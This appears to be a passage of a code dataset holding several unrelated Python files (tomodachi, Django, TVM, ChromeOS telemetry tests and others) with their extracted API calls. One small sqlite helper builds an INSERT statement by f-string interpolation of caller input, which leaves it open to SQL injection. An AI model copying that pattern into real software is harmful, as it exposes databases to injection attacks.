(['user_id'], {}), '(user_id)\\n', (2105, 2114), False, 'from vantage6.server import db\\n'), ((2862, 2880), 'flask.request.get_json', 'request.get_json', ([], {}), '()\\n', (2878, 2880), False, 'from flask import request, render_template\\n'), ((3582, 3609), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(1)'}), '(hours=1)\\n', (3600, 3609), False, 'import datetime\\n'), ((1354, 1394), 'pathlib.Path', 'Path', (['\"\"\"swagger/post_reset_password.yaml\"\"\"'], {}), \"('swagger/post_reset_password.yaml')\\n\", (1358, 1394), False, 'from pathlib import Path\\n'), ((2468, 2510), 'pathlib.Path', 'Path', (['\"\"\"swagger/post_recover_password.yaml\"\"\"'], {}), \"('swagger/post_recover_password.yaml')\\n\", (2472, 2510), False, 'from pathlib import Path\\n'), ((3214, 3247), 'vantage6.server.db.User.get_by_username', 'db.User.get_by_username', (['username'], {}), '(username)\\n', (3237, 3247), False, 'from vantage6.server import db\\n'), ((3289, 3316), 'vantage6.server.db.User.get_by_email', 'db.User.get_by_email', (['email'], {}), '(email)\\n', (3309, 3316), False, 'from vantage6.server import db\\n'), ((3869, 3936), 'flask.render_template', 'render_template', (['\"\"\"mail/reset_password_token.txt\"\"\"'], {'token': 'reset_token'}), \"('mail/reset_password_token.txt', token=reset_token)\\n\", (3884, 3936), False, 'from flask import request, render_template\\n'), ((3998, 4066), 'flask.render_template', 'render_template', (['\"\"\"mail/reset_password_token.html\"\"\"'], {'token': 'reset_token'}), \"('mail/reset_password_token.html', token=reset_token)\\n\", (4013, 4066), False, 'from flask import request, render_template\\n'), ((1897, 1922), 'flask_jwt_extended.decode_token', 'decode_token', (['reset_token'], {}), '(reset_token)\\n', (1909, 1922), False, 'from flask_jwt_extended import create_access_token, decode_token\\n')]"}}},{"rowIdx":754,"cells":{"code":{"kind":"string","value":"import os\nfrom typing import Any, Callable, Dict\n\nimport tomodachi\nfrom tomodachi import aws_sns_sqs, aws_sns_sqs_publish\nfrom tomodachi.discovery import AWSSNSRegistration\nfrom tomodachi.envelope import JsonBase\n\n\nasync def middleware_function(\n func: Callable, service: Any, message: Any, topic: str, context: Dict, *args: Any, **kwargs: Any\n) -> Any:\n # Functionality before function is called\n service.log(\"middleware before\")\n\n return_value = await func(*args, **kwargs)\n\n # There's also the possibility to pass in extra arguments or keywords arguments, for example:\n # return_value = await func(*args, id='overridden', **kwargs)\n\n # Functinoality after function is called\n service.log(\"middleware after\")\n\n return return_value\n\n\nclass ExampleAWSSNSSQSService(tomodachi.Service):\n name = \"example-aws-sns-sqs-service\"\n log_level = \"INFO\"\n uuid = str(os.environ.get(\"SERVICE_UUID\") or \"\")\n\n # Build own \"discovery\" functions, to be run on start and stop\n # See tomodachi/discovery/aws_sns_registration.py for example\n discovery = [AWSSNSRegistration]\n\n # The message envelope class defines how a message should be processed when sent and received\n # See tomodachi/envelope/json_base.py for a basic example using JSON and transferring some metadata\n message_envelope = JsonBase\n\n # Adds a middleware function that is run on every incoming message.\n # Several middlewares can be chained.\n message_middleware = [middleware_function]\n\n # Some options can be specified to define credentials, used ports, hostnames, access log, etc.\n options = {\n \"aws_sns_sqs\": {\n \"region_name\": None, # specify AWS region (example: 'eu-west-1')\n \"aws_access_key_id\": None, # specify AWS access key (example: '')\n \"aws_secret_access_key\": None, # specify AWS secret key (example: 'f7sha92hNotarealsecretkeyn29ShnSYQi3nzgA')\n },\n \"aws_endpoint_urls\": {\n \"sns\": None, # For example 'http://localhost:4575' if localstack is used for testing\n \"sqs\": None, # For example 'http://localhost:4576' if localstack is used for testing\n },\n }\n\n @aws_sns_sqs(\"example-route1\")\n async def route1a(self, data: Any) -> None:\n self.log('Received data (function: route1a) - \"{}\"'.format(data))\n\n async def _started_service(self) -> None:\n async def publish(data: Any, topic: str) -> None:\n self.log('Publish data \"{}\"'.format(data))\n await aws_sns_sqs_publish(self, data, topic=topic, wait=False)\n\n await publish(\"友達\", \"example-route1\")\n"},"apis":{"kind":"list like","value":["tomodachi.aws_sns_sqs_publish","os.environ.get","tomodachi.aws_sns_sqs"],"string":"[\n \"tomodachi.aws_sns_sqs_publish\",\n \"os.environ.get\",\n \"tomodachi.aws_sns_sqs\"\n]"},"extract_api":{"kind":"string","value":"[((2184, 2213), 'tomodachi.aws_sns_sqs', 'aws_sns_sqs', (['\"\"\"example-route1\"\"\"'], {}), \"('example-route1')\\n\", (2195, 2213), False, 'from tomodachi import aws_sns_sqs, aws_sns_sqs_publish\\n'), ((891, 921), 'os.environ.get', 'os.environ.get', (['\"\"\"SERVICE_UUID\"\"\"'], {}), \"('SERVICE_UUID')\\n\", (905, 921), False, 'import os\\n'), ((2514, 2570), 'tomodachi.aws_sns_sqs_publish', 'aws_sns_sqs_publish', (['self', 'data'], {'topic': 'topic', 'wait': '(False)'}), '(self, data, topic=topic, wait=False)\\n', (2533, 2570), False, 'from tomodachi import aws_sns_sqs, aws_sns_sqs_publish\\n')]"}}},{"rowIdx":755,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# @Author: GXR\n# @CreateTime: 2022-01-20\n# @UpdateTime: 2022-01-20\n\nimport redis\n\nimport config\nimport cookie_login\nfrom cookie_api import app\n\nred = redis.Redis(\n host=config.REDIS_HOST,\n port=config.REDIS_PORT,\n db=config.REDIS_DB,\n decode_responses=True,\n)\n\n\n# 刷新cookie数量\ndef cookie_refresh():\n while 1:\n cookie_list = red.smembers(config.REDIS_KEY_COOKIE)\n if len(cookie_list) >= config.COOKIE_COUNT:\n break\n cookie_login.run_cookie_login(1)\n app.logger.info(\"[cookie数量正常]-[%s]\" % len(cookie_list))\n\n\ndef run_cookie_refresh():\n cookie_refresh()\n\n\nif __name__ == \"__main__\":\n run_cookie_refresh()\n"},"apis":{"kind":"list like","value":["cookie_login.run_cookie_login","redis.Redis"],"string":"[\n \"cookie_login.run_cookie_login\",\n \"redis.Redis\"\n]"},"extract_api":{"kind":"string","value":"[((174, 281), 'redis.Redis', 'redis.Redis', ([], {'host': 'config.REDIS_HOST', 'port': 'config.REDIS_PORT', 'db': 'config.REDIS_DB', 'decode_responses': '(True)'}), '(host=config.REDIS_HOST, port=config.REDIS_PORT, db=config.\\n REDIS_DB, decode_responses=True)\\n', (185, 281), False, 'import redis\\n'), ((484, 516), 'cookie_login.run_cookie_login', 'cookie_login.run_cookie_login', (['(1)'], {}), '(1)\\n', (513, 516), False, 'import cookie_login\\n')]"}}},{"rowIdx":756,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n# start tutorial\nfrom django.db import models\nfrom djng.forms import NgModelFormMixin, NgFormValidationMixin\nfrom djng.styling.bootstrap3.forms import Bootstrap3ModelForm\n\n\nclass SubscribeUser(models.Model):\n full_name = models.CharField(\n \"\",\n max_length=99)\n\n avatar = models.ImageField(\"Avatar\", blank=False, null=True)\n\n permit = models.FileField(\"Permit\", blank=True, null=True)\n\n\nclass SubscribeForm(NgModelFormMixin, NgFormValidationMixin, Bootstrap3ModelForm):\n use_required_attribute = False\n scope_prefix = 'subscribe_data'\n form_name = 'my_form'\n\n class Meta:\n model = SubscribeUser\n fields = ['full_name', 'avatar', 'permit']\n"},"apis":{"kind":"list like","value":["django.db.models.ImageField","django.db.models.FileField","django.db.models.CharField"],"string":"[\n \"django.db.models.ImageField\",\n \"django.db.models.FileField\",\n \"django.db.models.CharField\"\n]"},"extract_api":{"kind":"string","value":"[((288, 329), 'django.db.models.CharField', 'models.CharField', (['\"\"\"\"\"\"'], {'max_length': '(99)'}), \"('', max_length=99)\\n\", (304, 329), False, 'from django.db import models\\n'), ((361, 412), 'django.db.models.ImageField', 'models.ImageField', (['\"\"\"Avatar\"\"\"'], {'blank': '(False)', 'null': '(True)'}), \"('Avatar', blank=False, null=True)\\n\", (378, 412), False, 'from django.db import models\\n'), ((427, 476), 'django.db.models.FileField', 'models.FileField', (['\"\"\"Permit\"\"\"'], {'blank': '(True)', 'null': '(True)'}), \"('Permit', blank=True, null=True)\\n\", (443, 476), False, 'from django.db import models\\n')]"}}},{"rowIdx":757,"cells":{"code":{"kind":"string","value":"# Licensed to the Apache Software Foundation (ASF) under one\r\n# or more contributor license agreements. See the NOTICE file\r\n# distributed with this work for additional information\r\n# regarding copyright ownership. The ASF licenses this file\r\n# to you under the Apache License, Version 2.0 (the\r\n# \"License\"); you may not use this file except in compliance\r\n# with the License. You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing,\r\n# software distributed under the License is distributed on an\r\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\r\n# KIND, either express or implied. See the License for the\r\n# specific language governing permissions and limitations\r\n# under the License.\r\n# pylint: disable=invalid-name\r\n\r\n\"\"\"Compute and schedule for add, multiply, subtract slice op\r\n\r\nPlease note the following assumptions made by the implementation:\r\n\r\n1) The inputs will be multiple of crouton layout except for the axis that needs broadcasting.\"\"\"\r\n\r\nfrom tvm import te\r\nfrom tvm import tir\r\nfrom tvm import topi\r\nfrom ..utils import get_layout_transform_fn\r\n\r\n\r\ndef add_broadcast_compute(input_a, input_b):\r\n \"\"\"Call the add op from topi\"\"\"\r\n return topi.add(input_a, input_b)\r\n\r\n\r\ndef subtract_broadcast_compute(input_a, input_b):\r\n \"\"\"Call the subtract op from topi\"\"\"\r\n return topi.subtract(input_a, input_b)\r\n\r\n\r\ndef multiply_broadcast_compute(input_a, input_b):\r\n \"\"\"Call the multiply op from topi\"\"\"\r\n return topi.multiply(input_a, input_b)\r\n\r\n\r\ndef tir_broadcast_schedule(\r\n out_m,\r\n input_a,\r\n input_b,\r\n output_layout: str,\r\n input_a_layout: str,\r\n input_b_layout: str,\r\n op_name: str,\r\n):\r\n \"\"\"Schedule for input and output layout nhwc-8h2w32c2w-2d considering broadcast\"\"\"\r\n func = te.create_prim_func([input_a, input_b, out_m])\r\n\r\n s = tir.Schedule(func)\r\n\r\n block_dict = {\"add\": \"T_add\", \"subtract\": \"T_subtract\", \"multiply\": \"T_multiply\"}\r\n\r\n block = s.get_block(block_dict[op_name])\r\n\r\n if input_a_layout == \"nhwc-8h2w32c2w-2d\":\r\n input_a_transformed_layout = get_layout_transform_fn(input_a_layout)\r\n s.transform_layout(block, buffer=(\"read\", 0), index_map=input_a_transformed_layout)\r\n\r\n if input_b_layout == \"nhwc-8h2w32c2w-2d\":\r\n input_b_transformed_layout = get_layout_transform_fn(input_b_layout)\r\n s.transform_layout(block, buffer=(\"read\", 1), index_map=input_b_transformed_layout)\r\n\r\n output_transformed_layout = get_layout_transform_fn(output_layout)\r\n s.transform_layout(block, buffer=(\"write\", 0), index_map=output_transformed_layout)\r\n\r\n n, h, w, c = s.get_loops(block)\r\n\r\n h_o, h_i = s.split(h, [None, 8])\r\n w_o, w_i = s.split(w, [None, 4])\r\n c_o, c_i = s.split(c, [None, 32])\r\n wio, wii = s.split(w_i, [None, 2])\r\n\r\n s.reorder(n, h_o, w_o, c_o, h_i, wio, c_i, wii)\r\n\r\n fused = s.fuse(c_i, wii)\r\n s.vectorize(fused)\r\n\r\n return s\r\n"},"apis":{"kind":"list like","value":["tvm.topi.add","tvm.tir.Schedule","tvm.te.create_prim_func","tvm.topi.subtract","tvm.topi.multiply"],"string":"[\n \"tvm.topi.add\",\n \"tvm.tir.Schedule\",\n \"tvm.te.create_prim_func\",\n \"tvm.topi.subtract\",\n \"tvm.topi.multiply\"\n]"},"extract_api":{"kind":"string","value":"[((1274, 1300), 'tvm.topi.add', 'topi.add', (['input_a', 'input_b'], {}), '(input_a, input_b)\\n', (1282, 1300), False, 'from tvm import topi\\n'), ((1410, 1441), 'tvm.topi.subtract', 'topi.subtract', (['input_a', 'input_b'], {}), '(input_a, input_b)\\n', (1423, 1441), False, 'from tvm import topi\\n'), ((1551, 1582), 'tvm.topi.multiply', 'topi.multiply', (['input_a', 'input_b'], {}), '(input_a, input_b)\\n', (1564, 1582), False, 'from tvm import topi\\n'), ((1856, 1902), 'tvm.te.create_prim_func', 'te.create_prim_func', (['[input_a, input_b, out_m]'], {}), '([input_a, input_b, out_m])\\n', (1875, 1902), False, 'from tvm import te\\n'), ((1914, 1932), 'tvm.tir.Schedule', 'tir.Schedule', (['func'], {}), '(func)\\n', (1926, 1932), False, 'from tvm import tir\\n')]"}}},{"rowIdx":758,"cells":{"code":{"kind":"string","value":"# Copyright (c) 2012 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\nimport json\nimport logging\nimport os\nimport unittest\n\nfrom telemetry.core import browser_finder\nfrom telemetry.core import exceptions\nfrom telemetry.core import extension_to_load\nfrom telemetry.core import util\nfrom telemetry.core.backends.chrome import cros_interface\nfrom telemetry.unittest import options_for_unittests\n\nclass CrOSAutoTest(unittest.TestCase):\n def setUp(self):\n options = options_for_unittests.GetCopy()\n self._cri = cros_interface.CrOSInterface(options.cros_remote,\n options.cros_ssh_identity)\n self._is_guest = options.browser_type == 'cros-chrome-guest'\n self._username = '' if self._is_guest else options.browser_options.username\n self._password = options.browser_options.password\n\n def _IsCryptohomeMounted(self):\n \"\"\"Returns True if cryptohome is mounted\"\"\"\n cryptohomeJSON, _ = self._cri.RunCmdOnDevice(['/usr/sbin/cryptohome',\n '--action=status'])\n cryptohomeStatus = json.loads(cryptohomeJSON)\n return (cryptohomeStatus['mounts'] and\n cryptohomeStatus['mounts'][0]['mounted'])\n\n def _CreateBrowser(self, autotest_ext=False, auto_login=True):\n \"\"\"Finds and creates a browser for tests. if autotest_ext is True,\n also loads the autotest extension\"\"\"\n options = options_for_unittests.GetCopy()\n\n if autotest_ext:\n extension_path = os.path.join(os.path.dirname(__file__), 'autotest_ext')\n self._load_extension = extension_to_load.ExtensionToLoad(\n path=extension_path,\n browser_type=options.browser_type,\n is_component=True)\n options.extensions_to_load = [self._load_extension]\n\n browser_to_create = browser_finder.FindBrowser(options)\n self.assertTrue(browser_to_create)\n options.browser_options.create_browser_with_oobe = True\n options.browser_options.auto_login = auto_login\n b = browser_to_create.Create()\n b.Start()\n return b\n\n def _GetAutotestExtension(self, browser):\n \"\"\"Returns the autotest extension instance\"\"\"\n extension = browser.extensions[self._load_extension]\n self.assertTrue(extension)\n return extension\n\n def _GetLoginStatus(self, browser):\n extension = self._GetAutotestExtension(browser)\n self.assertTrue(extension.EvaluateJavaScript(\n \"typeof('chrome.autotestPrivate') != 'undefined'\"))\n extension.ExecuteJavaScript('''\n window.__login_status = null;\n chrome.autotestPrivate.loginStatus(function(s) {\n window.__login_status = s;\n });\n ''')\n return util.WaitFor(\n lambda: extension.EvaluateJavaScript('window.__login_status'), 10)\n\n def testCryptohomeMounted(self):\n \"\"\"Verifies cryptohome mount status for regular and guest user and when\n logged out\"\"\"\n with self._CreateBrowser() as b:\n self.assertEquals(1, len(b.tabs))\n self.assertTrue(b.tabs[0].url)\n self.assertTrue(self._IsCryptohomeMounted())\n\n chronos_fs = self._cri.FilesystemMountedAt('/home/chronos/user')\n self.assertTrue(chronos_fs)\n if self._is_guest:\n self.assertEquals(chronos_fs, 'guestfs')\n else:\n home, _ = self._cri.RunCmdOnDevice(['/usr/sbin/cryptohome-path',\n 'user', self._username])\n self.assertEquals(self._cri.FilesystemMountedAt(home.rstrip()),\n chronos_fs)\n\n self.assertFalse(self._IsCryptohomeMounted())\n self.assertEquals(self._cri.FilesystemMountedAt('/home/chronos/user'),\n '/dev/mapper/encstateful')\n\n def testLoginStatus(self):\n \"\"\"Tests autotestPrivate.loginStatus\"\"\"\n with self._CreateBrowser(autotest_ext=True) as b:\n login_status = self._GetLoginStatus(b)\n self.assertEquals(type(login_status), dict)\n\n self.assertEquals(not self._is_guest, login_status['isRegularUser'])\n self.assertEquals(self._is_guest, login_status['isGuest'])\n self.assertEquals(login_status['email'], self._username)\n self.assertFalse(login_status['isScreenLocked'])\n\n def _IsScreenLocked(self, browser):\n return self._GetLoginStatus(browser)['isScreenLocked']\n\n def _LockScreen(self, browser):\n self.assertFalse(self._IsScreenLocked(browser))\n\n extension = self._GetAutotestExtension(browser)\n self.assertTrue(extension.EvaluateJavaScript(\n \"typeof chrome.autotestPrivate.lockScreen == 'function'\"))\n logging.info('Locking screen')\n extension.ExecuteJavaScript('chrome.autotestPrivate.lockScreen();')\n\n logging.info('Waiting for the lock screen')\n def ScreenLocked():\n return (browser.oobe and\n browser.oobe.EvaluateJavaScript(\"typeof Oobe == 'function'\") and\n browser.oobe.EvaluateJavaScript(\n \"typeof Oobe.authenticateForTesting == 'function'\"))\n util.WaitFor(ScreenLocked, 10)\n self.assertTrue(self._IsScreenLocked(browser))\n\n def _AttemptUnlockBadPassword(self, browser):\n logging.info('Trying a bad password')\n def ErrorBubbleVisible():\n return not browser.oobe.EvaluateJavaScript('''\n document.getElementById('bubble').hidden\n ''')\n self.assertFalse(ErrorBubbleVisible())\n browser.oobe.ExecuteJavaScript('''\n Oobe.authenticateForTesting('%s', 'bad');\n ''' % self._username)\n util.WaitFor(ErrorBubbleVisible, 10)\n self.assertTrue(self._IsScreenLocked(browser))\n\n def _UnlockScreen(self, browser):\n logging.info('Unlocking')\n browser.oobe.ExecuteJavaScript('''\n Oobe.authenticateForTesting('%s', '%s');\n ''' % (self._username, self._password))\n util.WaitFor(lambda: not browser.oobe, 10)\n self.assertFalse(self._IsScreenLocked(browser))\n\n def testScreenLock(self):\n \"\"\"Tests autotestPrivate.screenLock\"\"\"\n with self._CreateBrowser(autotest_ext=True) as browser:\n self._LockScreen(browser)\n self._AttemptUnlockBadPassword(browser)\n self._UnlockScreen(browser)\n\n def testLogout(self):\n \"\"\"Tests autotestPrivate.logout\"\"\"\n with self._CreateBrowser(autotest_ext=True) as b:\n extension = self._GetAutotestExtension(b)\n try:\n extension.ExecuteJavaScript('chrome.autotestPrivate.logout();')\n except (exceptions.BrowserConnectionGoneException,\n exceptions.BrowserGoneException):\n pass\n util.WaitFor(lambda: not self._IsCryptohomeMounted(), 20)\n\n def _SwitchRegion(self, region):\n self._cri.RunCmdOnDevice(['stop', 'ui'])\n\n # Change VPD (requires RW-enabled firmware).\n # To save time, region and initial_timezone are not set.\n vpd = {'initial_locale': region.language_code,\n 'keyboard_layout': region.keyboard}\n\n for (key, value) in vpd.items():\n self._cri.RunCmdOnDevice(['vpd', '-s', '\"%s\"=\"%s\"' % (key, value)])\n\n # Remove cached files to clear initial locale info and force regeneration.\n self._cri.RunCmdOnDevice(['rm', '/home/chronos/Local\\ State'])\n self._cri.RunCmdOnDevice(['rm', '/home/chronos/.oobe_completed'])\n self._cri.RunCmdOnDevice(['dump_vpd_log', '--force'])\n\n self._cri.RunCmdOnDevice(['start', 'ui'])\n\n def _OobeHasOption(self, browser, selectId, value):\n hasOptionJs = '''\n // Check that the option is present, and selected if it is the default.\n (function hasOption(selectId, value, isDefault) {\n var options = document.getElementById(selectId).options;\n for (var i = 0; i < options.length; i++) {\n if (options[i].value == value) {\n // The option is present. Make sure it's selected if necessary.\n return !isDefault || options.selectedIndex == i;\n }\n }\n return false;\n })(\"%s\", \"%s\", %s);\n '''\n return browser.oobe.EvaluateJavaScript(\n hasOptionJs % (selectId, value, 'true'))\n\n def _ResolveLanguage(self, locale):\n # If the locale matches a language but not the country, fall back to\n # an existing locale. See ui/base/l10n/l10n_util.cc.\n lang, _, region = map(str.lower, locale.partition('-'))\n if not region:\n return \"\"\n\n # Map from other countries to a localized country\n if lang == 'es' and region == 'es':\n return 'es-419'\n if lang == 'zh':\n if region in ('hk', 'mo'):\n return 'zh-TW'\n return 'zh-CN'\n if lang == 'en':\n if region in ('au', 'ca', 'nz', 'za'):\n return 'en-GB'\n return 'en-US'\n\n # No mapping found\n return \"\"\n\n def testOobeLocalization(self):\n \"\"\"Tests different region configurations at OOBE\"\"\"\n # Save the original device localization settings.\n # To save time, only read initial_locale and keyboard_layout.\n initial_region = self.Region('', '', '', '', '')\n initial_region.language_code, _ = self._cri.RunCmdOnDevice(\n ['vpd', '-g', 'initial_locale'])\n initial_region.keyboard, _ = self._cri.RunCmdOnDevice(\n ['vpd', '-g', 'keyboard_layout'])\n\n for region in self.REGIONS_LIST:\n self._SwitchRegion(region)\n with self._CreateBrowser(auto_login=False) as browser:\n # Ensure the dropdown lists have been created.\n util.WaitFor(lambda: browser.oobe.EvaluateJavaScript(\n 'document.getElementById(\"language-select\") != null'),\n 10)\n\n # Find the language, or an acceptable fallback value.\n languageFound = self._OobeHasOption(browser,\n 'language-select',\n region.language_code)\n if not languageFound:\n fallback = self._ResolveLanguage(region.language_code)\n self.assertTrue(fallback and\n self._OobeHasOption(browser,\n 'language-select',\n fallback))\n\n # Find the keyboard layout.\n self.assertTrue(self._OobeHasOption(\n browser, 'keyboard-select', region.keyboard))\n\n # Test is finished. Restore original region settings.\n self._SwitchRegion(initial_region)\n\n # The Region class and region list will be available in regions.py.\n class Region(object):\n def __init__(self, region_code, keyboard, time_zone, language_code,\n keyboard_mechanical_layout, description=None, notes=None):\n self.region_code = region_code\n self.keyboard = keyboard\n self.time_zone = time_zone\n self.language_code = language_code\n self.keyboard_mechanical_layout = keyboard_mechanical_layout\n self.description = description or region_code\n self.notes = notes\n\n class Enum(frozenset):\n def __getattr__(self, name):\n if name in self:\n return name\n raise AttributeError\n\n KeyboardMechanicalLayout = Enum(['ANSI', 'ISO', 'JIS', 'ABNT2'])\n _KML = KeyboardMechanicalLayout\n REGIONS_LIST = [\n Region('au', 'xkb:us::eng', 'Australia/Sydney', 'en-AU', _KML.ANSI,\n 'Australia'),\n Region('ca.ansi', 'xkb:us::eng', 'America/Toronto', 'en-CA', _KML.ANSI,\n 'Canada (US keyboard)',\n 'Canada with US (ANSI) keyboard; see http://goto/cros-canada'),\n Region('ca.fr', 'xkb:ca::fra', 'America/Toronto', 'fr-CA', _KML.ISO,\n 'Canada (French keyboard)',\n ('Canadian French (ISO) keyboard. The most common configuration for '\n 'Canadian French SKUs. See http://goto/cros-canada')),\n Region('ca.hybrid', 'xkb:ca:eng:eng', 'America/Toronto', 'en-CA', _KML.ISO,\n 'Canada (hybrid)',\n ('Canada with hybrid xkb:ca:eng:eng + xkb:ca::fra keyboard (ISO), '\n 'defaulting to English language and keyboard. Used only if there '\n 'needs to be a single SKU for all of Canada. See '\n 'http://goto/cros-canada')),\n Region('ca.multix', 'xkb:ca:multix:fra', 'America/Toronto', 'fr-CA',\n _KML.ISO, 'Canada (multilingual)',\n (\"Canadian Multilingual keyboard; you probably don't want this. See \"\n \"http://goto/cros-canada\")),\n Region('de', 'xkb:de::ger', 'Europe/Berlin', 'de', _KML.ISO, 'Germany'),\n Region('fi', 'xkb:fi::fin', 'Europe/Helsinki', 'fi', _KML.ISO, 'Finland'),\n Region('fr', 'xkb:fr::fra', 'Europe/Paris', 'fr', _KML.ISO, 'France'),\n Region('gb', 'xkb:gb:extd:eng', 'Europe/London', 'en-GB', _KML.ISO, 'UK'),\n Region('ie', 'xkb:gb:extd:eng', 'Europe/Dublin', 'en-GB', _KML.ISO,\n 'Ireland'),\n Region('in', 'xkb:us::eng', 'Asia/Calcutta', 'en-US', _KML.ANSI, 'India'),\n Region('my', 'xkb:us::eng', 'Asia/Kuala_Lumpur', 'ms', _KML.ANSI,\n 'Malaysia'),\n Region('nl', 'xkb:us:intl:eng', 'Europe/Amsterdam', 'nl', _KML.ANSI,\n 'Netherlands'),\n Region('nordic', 'xkb:se::swe', 'Europe/Stockholm', 'en-US', _KML.ISO,\n 'Nordics',\n ('Unified SKU for Sweden, Norway, and Denmark. This defaults '\n 'to Swedish keyboard layout, but starts with US English language '\n 'for neutrality. Use if there is a single combined SKU for Nordic '\n 'countries.')),\n Region('se', 'xkb:se::swe', 'Europe/Stockholm', 'sv', _KML.ISO, 'Sweden',\n (\"Use this if there separate SKUs for Nordic countries (Sweden, \"\n \"Norway, and Denmark), or the device is only shipping to Sweden. \"\n \"If there is a single unified SKU, use 'nordic' instead.\")),\n Region('sg', 'xkb:us::eng', 'Asia/Singapore', 'en-GB', _KML.ANSI,\n 'Singapore'),\n Region('us', 'xkb:us::eng', 'America/Los_Angeles', 'en-US', _KML.ANSI,\n 'United States'),\n ]\n"},"apis":{"kind":"list like","value":["json.loads","telemetry.core.browser_finder.FindBrowser","telemetry.core.backends.chrome.cros_interface.CrOSInterface","telemetry.core.util.WaitFor","os.path.dirname","telemetry.unittest.options_for_unittests.GetCopy","telemetry.core.extension_to_load.ExtensionToLoad","logging.info"],"string":"[\n \"json.loads\",\n \"telemetry.core.browser_finder.FindBrowser\",\n \"telemetry.core.backends.chrome.cros_interface.CrOSInterface\",\n \"telemetry.core.util.WaitFor\",\n \"os.path.dirname\",\n \"telemetry.unittest.options_for_unittests.GetCopy\",\n \"telemetry.core.extension_to_load.ExtensionToLoad\",\n \"logging.info\"\n]"},"extract_api":{"kind":"string","value":"[((561, 592), 'telemetry.unittest.options_for_unittests.GetCopy', 'options_for_unittests.GetCopy', ([], {}), '()\\n', (590, 592), False, 'from telemetry.unittest import options_for_unittests\\n'), ((609, 685), 'telemetry.core.backends.chrome.cros_interface.CrOSInterface', 'cros_interface.CrOSInterface', (['options.cros_remote', 'options.cros_ssh_identity'], {}), '(options.cros_remote, options.cros_ssh_identity)\\n', (637, 685), False, 'from telemetry.core.backends.chrome import cros_interface\\n'), ((1179, 1205), 'json.loads', 'json.loads', (['cryptohomeJSON'], {}), '(cryptohomeJSON)\\n', (1189, 1205), False, 'import json\\n'), ((1495, 1526), 'telemetry.unittest.options_for_unittests.GetCopy', 'options_for_unittests.GetCopy', ([], {}), '()\\n', (1524, 1526), False, 'from telemetry.unittest import options_for_unittests\\n'), ((1880, 1915), 'telemetry.core.browser_finder.FindBrowser', 'browser_finder.FindBrowser', (['options'], {}), '(options)\\n', (1906, 1915), False, 'from telemetry.core import browser_finder\\n'), ((4602, 4632), 'logging.info', 'logging.info', (['\"\"\"Locking screen\"\"\"'], {}), \"('Locking screen')\\n\", (4614, 4632), False, 'import logging\\n'), ((4714, 4757), 'logging.info', 'logging.info', (['\"\"\"Waiting for the lock screen\"\"\"'], {}), \"('Waiting for the lock screen')\\n\", (4726, 4757), False, 'import logging\\n'), ((5010, 5040), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['ScreenLocked', '(10)'], {}), '(ScreenLocked, 10)\\n', (5022, 5040), False, 'from telemetry.core import util\\n'), ((5149, 5186), 'logging.info', 'logging.info', (['\"\"\"Trying a bad password\"\"\"'], {}), \"('Trying a bad password')\\n\", (5161, 5186), False, 'import logging\\n'), ((5512, 5548), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['ErrorBubbleVisible', '(10)'], {}), '(ErrorBubbleVisible, 10)\\n', (5524, 5548), False, 'from telemetry.core import util\\n'), ((5645, 5670), 'logging.info', 'logging.info', (['\"\"\"Unlocking\"\"\"'], {}), \"('Unlocking')\\n\", (5657, 5670), False, 'import logging\\n'), ((5815, 5858), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['(lambda : not browser.oobe)', '(10)'], {}), '(lambda : not browser.oobe, 10)\\n', (5827, 5858), False, 'from telemetry.core import util\\n'), ((1657, 1770), 'telemetry.core.extension_to_load.ExtensionToLoad', 'extension_to_load.ExtensionToLoad', ([], {'path': 'extension_path', 'browser_type': 'options.browser_type', 'is_component': '(True)'}), '(path=extension_path, browser_type=options\\n .browser_type, is_component=True)\\n', (1690, 1770), False, 'from telemetry.core import extension_to_load\\n'), ((1585, 1610), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\\n', (1600, 1610), False, 'import os\\n')]"}}},{"rowIdx":759,"cells":{"code":{"kind":"string","value":"import sqlite3\n\n\nclass Database:\n def get_connection(self):\n return sqlite3.connect(\"./db.sqlite\")\n\n def add_card(self, card_title, card_text, card_link_text, card_link_url):\n con = self.get_connection()\n cur = con.cursor()\n\n create_table_query = \"CREATE TABLE IF NOT EXISTS cards('card_title' VARCHAR,\" + \\\n \" 'card_text' TEXT, 'card_link_text' VARCHAR, 'card_link_url' VARCHAR )\"\n insert_data_query = f\"INSERT INTO \" + \\\n f\"cards VALUES ({card_title}, {card_text}, {card_link_text}, {card_link_url})\"\n try:\n cur.execute(create_table_query)\n cur.execute(insert_data_query)\n con.commit()\n except:\n print(\"an error has been occurred !\")\n"},"apis":{"kind":"list like","value":["sqlite3.connect"],"string":"[\n \"sqlite3.connect\"\n]"},"extract_api":{"kind":"string","value":"[((78, 108), 'sqlite3.connect', 'sqlite3.connect', (['\"\"\"./db.sqlite\"\"\"'], {}), \"('./db.sqlite')\\n\", (93, 108), False, 'import sqlite3\\n')]"}}},{"rowIdx":760,"cells":{"code":{"kind":"string","value":"import subprocess\nsubprocess.Popen(['sh', '../Switches/Switch3_On.sh'])\n"},"apis":{"kind":"list like","value":["subprocess.Popen"],"string":"[\n \"subprocess.Popen\"\n]"},"extract_api":{"kind":"string","value":"[((18, 71), 'subprocess.Popen', 'subprocess.Popen', ([\"['sh', '../Switches/Switch3_On.sh']\"], {}), \"(['sh', '../Switches/Switch3_On.sh'])\\n\", (34, 71), False, 'import subprocess\\n')]"}}},{"rowIdx":761,"cells":{"code":{"kind":"string","value":"from collections import namedtuple\n\nimport torch\nfrom torch.nn import (AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d,\n Module, PReLU, ReLU, Sequential, Sigmoid)\n\n# yapf: disable\n\"\"\"\nArcFace implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch) # isort:skip # noqa\n\"\"\"\n# yapf: enable\n\n\nclass Flatten(Module):\n \"\"\"Flatten Module.\"\"\"\n\n def forward(self, input):\n return input.view(input.size(0), -1)\n\n\ndef l2_norm(input, 